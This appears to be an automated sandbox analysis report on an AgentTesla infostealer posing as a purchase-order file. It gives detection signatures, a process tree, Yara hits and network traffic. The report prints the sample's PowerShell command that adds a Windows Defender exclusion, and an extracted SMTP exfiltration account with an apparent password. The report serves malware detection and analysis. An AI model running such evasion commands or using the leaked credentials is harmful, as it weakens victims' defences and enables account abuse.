Loading ...

Play interactive tourEdit tour

Analysis Report 08042021New-PurchaseOrder.bat

Overview

General Information

Sample Name:08042021New-PurchaseOrder.bat (renamed file extension from bat to exe)
Analysis ID:383917
MD5:27233176a2a979195b01a53ec16c7631
SHA1:0ef424d2000f18e6b83473535bf85d22ed9ab79b
SHA256:397a62fc978f7a97a87caaf9c35e98e4a053de4e786beee73a6c1ac0e99c9fc9
Tags:AgentTeslabatYahoo
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • 08042021New-PurchaseOrder.exe (PID: 4952 cmdline: 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 4436 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5744 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 5828 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3636 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1928 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6284 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • SWqTT.exe (PID: 3064 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 5204 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5304 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • SWqTT.exe (PID: 5192 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 7116 cmdline: 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: SWqTT.exe PID: 3064JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            32.2.SWqTT.exe.64915d0.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                32.2.SWqTT.exe.64915d0.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 32.2.SWqTT.exe.64915d0.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeReversingLabs: Detection: 14%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 08042021New-PurchaseOrder.exeReversingLabs: Detection: 14%
                      Source: unknownHTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.3:49704 version: TLS 1.0
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.233606021.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdbZ source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32# source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jVisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Configuration.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb-Q source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: O.pdb4( source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb5t source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302660548.0000000006764000.00000004.00000001.sdmp
                      Source: Binary string: System.Drawing.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Drawing.pdb9 source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: @sxC:\Users\user\Desktop\08042021New-PurchaseOrder.PDBO source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: ww08042021New-PurchaseOrder.PDB source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbu source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32 source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdbD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Windows.Forms.pdb04lk source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: Joe Sandbox ViewIP Address: 172.67.150.212 172.67.150.212
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: unknownHTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.3:49704 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
